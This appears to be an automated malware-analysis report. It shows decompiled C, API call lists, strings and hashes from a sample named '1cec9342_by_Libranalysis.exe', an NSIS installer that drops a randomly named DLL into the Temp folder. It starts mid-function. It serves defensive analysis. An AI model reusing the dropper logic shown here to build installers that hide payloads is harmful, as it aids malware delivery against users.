                                                                                    				intOrPtr _v40;
                                                                                    				signed int _v44;
                                                                                    				long _t43;
                                                                                    				long _t50;
                                                                                    				void* _t57;
                                                                                    				intOrPtr* _t59;
                                                                                    				long _t60;
                                                                                    				long _t70;
                                                                                    				signed int _t77;
                                                                                    				intOrPtr _t80;
                                                                                    				long _t82;
                                                                                    				void* _t85;
                                                                                    				signed int _t87;
                                                                                    				void* _t89;
                                                                                    				long _t90;
                                                                                    				long _t93;
                                                                                    				intOrPtr* _t94;
                                                                                    
                                                                                    				_t82 = 0;
                                                                                    				_v12 = 0;
                                                                                    				_v8 = 0;
                                                                                    				_t43 = GetTickCount();
                                                                                    				_t91 = "C:\\Users\\jones\\Desktop\\1cec9342_by_Libranalysis.exe";
                                                                                    				 *0x42f430 = _t43 + 0x3e8;
                                                                                    				GetModuleFileNameA(0, "C:\\Users\\jones\\Desktop\\1cec9342_by_Libranalysis.exe", 0x400);
                                                                                    				_t89 = E00405C90(_t91, 0x80000000, 3);
                                                                                    				_v16 = _t89;
                                                                                    				 *0x40a018 = _t89;
                                                                                    				if(_t89 == 0xffffffff) {
                                                                                    					return "Error launching installer";
                                                                                    				}
                                                                                    				_t92 = "C:\\Users\\jones\\Desktop";
                                                                                    				E004060F7("C:\\Users\\jones\\Desktop", _t91);
                                                                                    				E004060F7(0x437000, E00405AD6(_t92));
                                                                                    				_t50 = GetFileSize(_t89, 0);
                                                                                    				 *0x42944c = _t50;
                                                                                    				_t93 = _t50;
                                                                                    				if(_t50 <= 0) {
                                                                                    					L24:
                                                                                    					E00402E3D(1);
                                                                                    					if( *0x42f438 == _t82) {
                                                                                    						goto L29;
                                                                                    					}
                                                                                    					if(_v8 == _t82) {
                                                                                    						L28:
                                                                                    						_t94 = GlobalAlloc(0x40, _v24);
                                                                                    						E00403300( *0x42f438 + 0x1c);
                                                                                    						_push(_v24);
                                                                                    						_push(_t94);
                                                                                    						_push(_t82);
                                                                                    						_push(0xffffffff); // executed
                                                                                    						_t57 = E004030D8(); // executed
                                                                                    						if(_t57 == _v24) {
                                                                                    							 *0x42f434 = _t94;
                                                                                    							 *0x42f43c =  *_t94;
                                                                                    							if((_v44 & 0x00000001) != 0) {
                                                                                    								 *0x42f440 =  *0x42f440 + 1;
                                                                                    							}
                                                                                    							_t40 = _t94 + 0x44; // 0x44
                                                                                    							_t59 = _t40;
                                                                                    							_t85 = 8;
                                                                                    							do {
                                                                                    								_t59 = _t59 - 8;
                                                                                    								 *_t59 =  *_t59 + _t94;
                                                                                    								_t85 = _t85 - 1;
                                                                                    							} while (_t85 != 0);
                                                                                    							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                    							 *(_t94 + 0x3c) = _t60;
                                                                                    							E00405C4B(0x42f460, _t94 + 4, 0x40);
                                                                                    							return 0;
                                                                                    						}
                                                                                    						goto L29;
                                                                                    					}
                                                                                    					E00403300( *0x41d440);
                                                                                    					if(E004032EA( &_a4, 4) == 0 || _v12 != _a4) {
                                                                                    						goto L29;
                                                                                    					} else {
                                                                                    						goto L28;
                                                                                    					}
                                                                                    				} else {
                                                                                    					do {
                                                                                    						_t90 = _t93;
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t70 = ( ~( *0x42f438) & 0x00007e00) + 0x200;
                                                                                    						if(_t93 >= _t70) {
                                                                                    							_t90 = _t70;
                                                                                    						}
                                                                                    						if(E004032EA(0x415440, _t90) == 0) {
                                                                                    							E00402E3D(1);
                                                                                    							L29:
                                                                                    							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                    						}
                                                                                    						if( *0x42f438 != 0) {
                                                                                    							if((_a4 & 0x00000002) == 0) {
                                                                                    								E00402E3D(0);
                                                                                    							}
                                                                                    							goto L20;
                                                                                    						}
                                                                                    						E00405C4B( &_v44, 0x415440, 0x1c);
                                                                                    						_t77 = _v44;
                                                                                    						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                                                    							_a4 = _a4 | _t77;
                                                                                    							_t87 =  *0x41d440; // 0x66495
                                                                                    							 *0x42f4e0 =  *0x42f4e0 | _a4 & 0x00000002;
                                                                                    							_t80 = _v20;
                                                                                    							 *0x42f438 = _t87;
                                                                                    							if(_t80 > _t93) {
                                                                                    								goto L29;
                                                                                    							}
                                                                                    							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                    								_v8 = _v8 + 1;
                                                                                    								_t24 = _t80 - 4; // 0x40a194
                                                                                    								_t93 = _t24;
                                                                                    								if(_t90 > _t93) {
                                                                                    									_t90 = _t93;
                                                                                    								}
                                                                                    								goto L20;
                                                                                    							} else {
                                                                                    								break;
                                                                                    							}
                                                                                    						}
                                                                                    						L20:
                                                                                    						if(_t93 <  *0x42944c) {
                                                                                    							_v12 = E004065B7(_v12, 0x415440, _t90);
                                                                                    						}
                                                                                    						 *0x41d440 =  *0x41d440 + _t90;
                                                                                    						_t93 = _t93 - _t90;
                                                                                    					} while (_t93 != 0);
                                                                                    					_t82 = 0;
                                                                                    					goto L24;
                                                                                    				}
                                                                                    			}





























                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00402EB2
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,00000400), ref: 00402ECE
                                                                                      • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00405C94
                                                                                      • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00402F1A
                                                                                    • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                                                    Strings
                                                                                    • Null, xrefs: 00402F98
                                                                                    • soft, xrefs: 00402F8F
                                                                                    • Inst, xrefs: 00402F86
                                                                                    • C:\Users\user\Desktop, xrefs: 00402EFC, 00402F01, 00402F07
                                                                                    • Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller's author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error, xrefs: 00403077
                                                                                    • Error launching installer, xrefs: 00402EF1
                                                                                    • "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" , xrefs: 00402EA1
                                                                                    • C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe, xrefs: 00402EB8, 00402EC7, 00402EDB, 00402EFB
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EA8
                                                                                    • @TA, xrefs: 00402F2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 61%
                                                                                    			E00401759(FILETIME* __ebx, void* __eflags) {
                                                                                    				void* _t33;
                                                                                    				void* _t41;
                                                                                    				void* _t43;
                                                                                    				FILETIME* _t49;
                                                                                    				FILETIME* _t62;
                                                                                    				void* _t64;
                                                                                    				signed int _t70;
                                                                                    				FILETIME* _t71;
                                                                                    				FILETIME* _t75;
                                                                                    				signed int _t77;
                                                                                    				void* _t80;
                                                                                    				CHAR* _t82;
                                                                                    				CHAR* _t83;
                                                                                    				void* _t85;
                                                                                    
                                                                                    				_t75 = __ebx;
                                                                                    				_t82 = E00402BCE(0x31);
                                                                                    				 *(_t85 - 8) = _t82;
                                                                                    				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                    				_t33 = E00405AFC(_t82);
                                                                                    				_push(_t82);
                                                                                    				_t83 = "uvlcopdlxoed";
                                                                                    				if(_t33 == 0) {
                                                                                    					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                                                                                    				} else {
                                                                                    					E004060F7();
                                                                                    				}
                                                                                    				E004063D2(_t83);
                                                                                    				while(1) {
                                                                                    					__eflags =  *(_t85 + 8) - 3;
                                                                                    					if( *(_t85 + 8) >= 3) {
                                                                                    						_t64 = E0040646B(_t83);
                                                                                    						_t77 = 0;
                                                                                    						__eflags = _t64 - _t75;
                                                                                    						if(_t64 != _t75) {
                                                                                    							_t71 = _t64 + 0x14;
                                                                                    							__eflags = _t71;
                                                                                    							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                    						}
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                    						__eflags = _t70;
                                                                                    						 *(_t85 + 8) = _t70;
                                                                                    					}
                                                                                    					__eflags =  *(_t85 + 8) - _t75;
                                                                                    					if( *(_t85 + 8) == _t75) {
                                                                                    						E00405C6B(_t83);
                                                                                    					}
                                                                                    					__eflags =  *(_t85 + 8) - 1;
                                                                                    					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                    					__eflags = _t41 - 0xffffffff;
                                                                                    					 *(_t85 - 0xc) = _t41;
                                                                                    					if(_t41 != 0xffffffff) {
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags =  *(_t85 + 8) - _t75;
                                                                                    					if( *(_t85 + 8) != _t75) {
                                                                                    						E0040521E(0xffffffe2,  *(_t85 - 8));
                                                                                    						__eflags =  *(_t85 + 8) - 2;
                                                                                    						if(__eflags == 0) {
                                                                                    							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                    						}
                                                                                    						L31:
                                                                                    						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
                                                                                    						__eflags =  *0x42f4c8;
                                                                                    						goto L32;
                                                                                    					} else {
                                                                                    						E004060F7(0x40ac38, 0x430000);
                                                                                    						E004060F7(0x430000, _t83);
                                                                                    						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\jones\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                    						E004060F7(0x430000, 0x40ac38);
                                                                                    						_t62 = E00405813("C:\Users\jones\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                                    						__eflags = _t62;
                                                                                    						if(_t62 == 0) {
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							__eflags = _t62 == 1;
                                                                                    							if(_t62 == 1) {
                                                                                    								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
                                                                                    								L32:
                                                                                    								_t49 = 0;
                                                                                    								__eflags = 0;
                                                                                    							} else {
                                                                                    								_push(_t83);
                                                                                    								_push(0xfffffffa);
                                                                                    								E0040521E();
                                                                                    								L29:
                                                                                    								_t49 = 0x7fffffff;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					L33:
                                                                                    					return _t49;
                                                                                    				}
                                                                                    				E0040521E(0xffffffea,  *(_t85 - 8));
                                                                                    				 *0x42f4f4 =  *0x42f4f4 + 1;
                                                                                    				_push(_t75);
                                                                                    				_push(_t75);
                                                                                    				_push( *(_t85 - 0xc));
                                                                                    				_push( *((intOrPtr*)(_t85 - 0x20)));
                                                                                    				_t43 = E004030D8(); // executed
                                                                                    				 *0x42f4f4 =  *0x42f4f4 - 1;
                                                                                    				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                    				_t80 = _t43;
                                                                                    				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                    					L22:
                                                                                    					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                                                    				} else {
                                                                                    					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                                    					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                                    						goto L22;
                                                                                    					}
                                                                                    				}
                                                                                    				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                                                    				__eflags = _t80 - _t75;
                                                                                    				if(_t80 >= _t75) {
                                                                                    					goto L31;
                                                                                    				} else {
                                                                                    					__eflags = _t80 - 0xfffffffe;
                                                                                    					if(_t80 != 0xfffffffe) {
                                                                                    						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
                                                                                    					} else {
                                                                                    						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
                                                                                    						lstrcatA(_t83,  *(_t85 - 8));
                                                                                    					}
                                                                                    					_push(0x200010);
                                                                                    					_push(_t83);
                                                                                    					E00405813();
                                                                                    					goto L29;
                                                                                    				}
                                                                                    				goto L33;
                                                                                    			}


















                                                                                    APIs
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,uvlcopdlxoed,uvlcopdlxoed,00000000,00000000,uvlcopdlxoed,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                      • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,arability Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                      • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,73BCEA30), ref: 0040527A
                                                                                      • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsu26D1.tmp\8t7v9o92aq2mtu.dll$uvlcopdlxoed
                                                                                    • API String ID: 1941528284-2640653109
                                                                                    • Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                                                    • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                                    • Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                                                    • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 95%
                                                                                    			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                                                    				signed int _v8;
                                                                                    				int _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				long _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				char _v88;
                                                                                    				void* _t65;
                                                                                    				void* _t69;
                                                                                    				long _t70;
                                                                                    				intOrPtr _t75;
                                                                                    				long _t76;
                                                                                    				intOrPtr _t77;
                                                                                    				void* _t78;
                                                                                    				int _t88;
                                                                                    				intOrPtr _t92;
                                                                                    				intOrPtr _t95;
                                                                                    				long _t96;
                                                                                    				signed int _t97;
                                                                                    				int _t98;
                                                                                    				int _t99;
                                                                                    				intOrPtr _t100;
                                                                                    				void* _t101;
                                                                                    				void* _t102;
                                                                                    
                                                                                    				_t97 = _a16;
                                                                                    				_t92 = _a12;
                                                                                    				_v12 = _t97;
                                                                                    				if(_t92 == 0) {
                                                                                    					_v12 = 0x8000;
                                                                                    				}
                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                    				_v16 = _t92;
                                                                                    				if(_t92 == 0) {
                                                                                    					_v16 = 0x421448;
                                                                                    				}
                                                                                    				_t62 = _a4;
                                                                                    				if(_a4 >= 0) {
                                                                                    					E00403300( *0x42f498 + _t62);
                                                                                    				}
                                                                                    				if(E004032EA( &_a16, 4) == 0) {
                                                                                    					L41:
                                                                                    					_push(0xfffffffd);
                                                                                    					goto L42;
                                                                                    				} else {
                                                                                    					if((_a19 & 0x00000080) == 0) {
                                                                                    						if(_t92 != 0) {
                                                                                    							if(_a16 < _t97) {
                                                                                    								_t97 = _a16;
                                                                                    							}
                                                                                    							if(E004032EA(_t92, _t97) != 0) {
                                                                                    								_v8 = _t97;
                                                                                    								L44:
                                                                                    								return _v8;
                                                                                    							} else {
                                                                                    								goto L41;
                                                                                    							}
                                                                                    						}
                                                                                    						if(_a16 <= _t92) {
                                                                                    							goto L44;
                                                                                    						}
                                                                                    						_t88 = _v12;
                                                                                    						while(1) {
                                                                                    							_t98 = _a16;
                                                                                    							if(_a16 >= _t88) {
                                                                                    								_t98 = _t88;
                                                                                    							}
                                                                                    							if(E004032EA(0x41d448, _t98) == 0) {
                                                                                    								goto L41;
                                                                                    							}
                                                                                    							_t69 = E00405D37(_a8, 0x41d448, _t98); // executed
                                                                                    							if(_t69 == 0) {
                                                                                    								L28:
                                                                                    								_push(0xfffffffe);
                                                                                    								L42:
                                                                                    								_pop(_t65);
                                                                                    								return _t65;
                                                                                    							}
                                                                                    							_v8 = _v8 + _t98;
                                                                                    							_a16 = _a16 - _t98;
                                                                                    							if(_a16 > 0) {
                                                                                    								continue;
                                                                                    							}
                                                                                    							goto L44;
                                                                                    						}
                                                                                    						goto L41;
                                                                                    					}
                                                                                    					_t70 = GetTickCount();
                                                                                    					 *0x40bdac =  *0x40bdac & 0x00000000;
                                                                                    					 *0x40bda8 =  *0x40bda8 & 0x00000000;
                                                                                    					_t14 =  &_a16;
                                                                                    					 *_t14 = _a16 & 0x7fffffff;
                                                                                    					_v20 = _t70;
                                                                                    					 *0x40b890 = 8;
                                                                                    					 *0x415438 = 0x40d430;
                                                                                    					 *0x415434 = 0x40d430;
                                                                                    					 *0x415430 = 0x415430;
                                                                                    					_a4 = _a16;
                                                                                    					if( *_t14 <= 0) {
                                                                                    						goto L44;
                                                                                    					} else {
                                                                                    						goto L9;
                                                                                    					}
                                                                                    					while(1) {
                                                                                    						L9:
                                                                                    						_t99 = 0x4000;
                                                                                    						if(_a16 < 0x4000) {
                                                                                    							_t99 = _a16;
                                                                                    						}
                                                                                    						if(E004032EA(0x41d448, _t99) == 0) {
                                                                                    							goto L41;
                                                                                    						}
                                                                                    						_a16 = _a16 - _t99;
                                                                                    						 *0x40b880 = 0x41d448;
                                                                                    						 *0x40b884 = _t99;
                                                                                    						while(1) {
                                                                                    							_t95 = _v16;
                                                                                    							 *0x40b888 = _t95;
                                                                                    							 *0x40b88c = _v12;
                                                                                    							_t75 = E00406625(0x40b880);
                                                                                    							_v24 = _t75;
                                                                                    							if(_t75 < 0) {
                                                                                    								break;
                                                                                    							}
                                                                                    							_t100 =  *0x40b888; // 0x422448
                                                                                    							_t101 = _t100 - _t95;
                                                                                    							_t76 = GetTickCount();
                                                                                    							_t96 = _t76;
                                                                                    							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                                                    								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                                                    								_t102 = _t102 + 0xc;
                                                                                    								E0040521E(0,  &_v88);
                                                                                    								_v20 = _t96;
                                                                                    							}
                                                                                    							if(_t101 == 0) {
                                                                                    								if(_a16 > 0) {
                                                                                    									goto L9;
                                                                                    								}
                                                                                    								goto L44;
                                                                                    							} else {
                                                                                    								if(_a12 != 0) {
                                                                                    									_t77 =  *0x40b888; // 0x422448
                                                                                    									_v8 = _v8 + _t101;
                                                                                    									_v12 = _v12 - _t101;
                                                                                    									_v16 = _t77;
                                                                                    									L23:
                                                                                    									if(_v24 != 1) {
                                                                                    										continue;
                                                                                    									}
                                                                                    									goto L44;
                                                                                    								}
                                                                                    								_t78 = E00405D37(_a8, _v16, _t101); // executed
                                                                                    								if(_t78 == 0) {
                                                                                    									goto L28;
                                                                                    								}
                                                                                    								_v8 = _v8 + _t101;
                                                                                    								goto L23;
                                                                                    							}
                                                                                    						}
                                                                                    						_push(0xfffffffc);
                                                                                    						goto L42;
                                                                                    					}
                                                                                    					goto L41;
                                                                                    				}
                                                                                    			}



























                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CountTick$wsprintf
                                                                                    • String ID: ... %d%%$H$B
                                                                                    • API String ID: 551687249-630640294
                                                                                    • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                                    • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                                    • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                                    • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004056E4(CHAR* _a4) {
                                                                                    				struct _SECURITY_ATTRIBUTES _v16;
                                                                                    				struct _SECURITY_DESCRIPTOR _v36;
                                                                                    				int _t22;
                                                                                    				long _t23;
                                                                                    
                                                                                    				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                    				_v36.Owner = 0x408384;
                                                                                    				_v36.Group = 0x408384;
                                                                                    				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                    				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                    				_v16.lpSecurityDescriptor =  &_v36;
                                                                                    				_v36.Revision = 1;
                                                                                    				_v36.Control = 4;
                                                                                    				_v36.Dacl = 0x408374;
                                                                                    				_v16.nLength = 0xc;
                                                                                    				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                                                    				if(_t22 != 0) {
                                                                                    					L1:
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t23 = GetLastError();
                                                                                    				if(_t23 == 0xb7) {
                                                                                    					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                                    						goto L1;
                                                                                    					}
                                                                                    					return GetLastError();
                                                                                    				}
                                                                                    				return _t23;
                                                                                    			}








                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                                    • GetLastError.KERNEL32 ref: 0040573B
                                                                                    • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                                    • GetLastError.KERNEL32 ref: 0040575A
                                                                                    Strings
                                                                                    • C:\Users\user\Desktop, xrefs: 004056E4
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                    • API String ID: 3449924974-2028306314
                                                                                    • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                    • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                                    • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                                    • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00406492(intOrPtr _a4) {
                                                                                    				char _v292;
                                                                                    				int _t10;
                                                                                    				struct HINSTANCE__* _t14;
                                                                                    				void* _t16;
                                                                                    				void* _t21;
                                                                                    
                                                                                    				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                    				if(_t10 > 0x104) {
                                                                                    					_t10 = 0;
                                                                                    				}
                                                                                    				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                    					_t16 = 1;
                                                                                    				} else {
                                                                                    					_t16 = 0;
                                                                                    				}
                                                                                    				_t5 = _t16 + 0x40a014; // 0x5c
                                                                                    				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                    				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                    				return _t14;
                                                                                    			}









                                                                                    APIs
                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                                    • wsprintfA.USER32 ref: 004064E2
                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                    • API String ID: 2200240437-4240819195
                                                                                    • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                    • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                                    • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
